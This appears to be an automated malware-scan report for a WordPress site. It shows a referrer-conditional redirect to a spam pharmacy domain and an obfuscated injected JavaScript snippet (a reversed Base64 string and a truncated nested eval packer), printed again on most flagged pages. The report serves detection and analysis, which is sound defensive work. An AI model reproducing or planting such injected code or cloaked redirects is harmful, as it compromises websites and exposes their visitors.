Malicious/Suspicious Redirects
Request | Server response | Status |
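Request:
URL: http://www.uuone.net/ (imitation of visitor from search engine)
GET / HTTP/1.1
Host: www.uuone.net
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: close
Date: Wed, 24 Sep 2014 08:22:24 GMT
Location: http://topdrugstore-24h.com/site/search?q=www.uuone.net
Server: LiteSpeed
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.27

Status: malicious

Note: this 302 to a third-party domain was returned for a request carrying a search-engine Referer, while the same URL is listed with 200 OK under "Scanned pages/files" below. This suggests the redirect is conditional on the referrer, so a direct visit to the site may not reproduce it.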
Scanned pages/files
Request | Server response | Status |
http://www.uuone.net/ | 200 OK Content-Length: 43410 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):

var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1

Decoded script:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e,

(Both excerpts are truncated in this report. The string literal begins with "=", so it appears to be Base64 written in reverse. The decoded script shows the eval(function(p,a,c,k,e,d) packer wrapper nested inside itself at least three times, so the final payload is not visible here. The same snippet is reported on every page flagged malicious in this scan, which suggests it is injected site-wide rather than into individual posts.)

Antivirus reports:
| ||
http://www.uuone.net/sample-page/ | 200 OK Content-Length: 29557 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/wp-admin/ | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 24 Sep 2014 08:22:30 GMT Pragma: no-cache Location: http://www.uuone.net/wp-login.php?redirect_to=http%3A%2F%2Fwww.uuone.net%2Fwp-admin%2F&reauth=1 Server: LiteSpeed Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Powered-By: PHP/5.3.27 | clean |
http://www.uuone.net/wp-login.php?redirect_to=http%3a%2f%2fwww.uuone.net%2fwp-admin%2f&reauth=1 | 200 OK Content-Length: 2213 Content-Type: text/html | clean |
http://www.uuone.net/wp-login.php?action=lostpassword | 200 OK Content-Length: 1882 Content-Type: text/html | clean |
http://www.uuone.net/wp-login.php | 200 OK Content-Length: 2213 Content-Type: text/html | clean |
http://www.uuone.net/test404page.js | 404 Not Found Content-Length: 3 Content-Type: text/html | clean |
http://www.uuone.net/wp-login.php?redirect_to=http%3A%2F%2Fwww.uuone.net%2Fsample-page%2F | 200 OK Content-Length: 2216 Content-Type: text/html | clean |
http://www.uuone.net/2013/03/11/%e6%b2%bc%e6%b0%a3%e6%b1%a0/ | 200 OK Content-Length: 43449 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/category/uncategorized/ | 200 OK Content-Length: 38679 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/?p=94 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 08:22:39 GMT Location: http://www.uuone.net/2013/03/11/%e6%b2%bc%e6%b0%a3%e6%b1%a0/ Server: LiteSpeed Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.uuone.net/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.uuone.net/2013/03/11/%e6%bf%be%e7%b4%99/ | 200 OK Content-Length: 30627 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/?p=92 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 08:22:42 GMT Location: http://www.uuone.net/2013/03/11/%e6%bf%be%e7%b4%99/ Server: LiteSpeed Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.uuone.net/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.uuone.net/author/admin/ | 200 OK Content-Length: 39653 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/2013/03/11/%e6%b4%97/ | 200 OK Content-Length: 32135 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/?p=90 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 08:22:52 GMT Location: http://www.uuone.net/2013/03/11/%e6%b4%97/ Server: LiteSpeed Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.uuone.net/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.uuone.net/wp-login.php?redirect_to=http%3A%2F%2Fwww.uuone.net%2F2013%2F03%2F11%2F%25e6%25b4%2597%2F | 200 OK Content-Length: 2225 Content-Type: text/html | clean |
http://www.uuone.net/2013/03/11/%e9%ab%98%e5%a3%93%e6%bb%85%e8%8f%8c/ | 200 OK Content-Length: 30430 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4IDfwRHdodjM8BHd0hGf05WZtV3YvRGOywXek9mY8Rnbl1 Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://www.uuone.net/?p=88 | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Sep 2014 08:22:59 GMT Location: http://www.uuone.net/2013/03/11/%e9%ab%98%e5%a3%93%e6%bb%85%e8%8f%8c/ Server: LiteSpeed Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.uuone.net/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.uuone.net/wp-login.php?redirect_to=http%3A%2F%2Fwww.uuone.net%2F2013%2F03%2F11%2F%25e9%25ab%2598%25e5%25a3%2593%25e6%25bb%2585%25e8%258f%258c%2F | 200 OK Content-Length: 2252 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=uuone.net
Result: This site is not currently listed as suspicious.
Note: a clean blacklist result does not contradict the scan findings above, because blacklist listings can lag behind a compromise.
Query: http://yandex.com/infected?l10n=en&url=http://uuone.net/
Result: uuone.net is not infected or malware details are not published yet.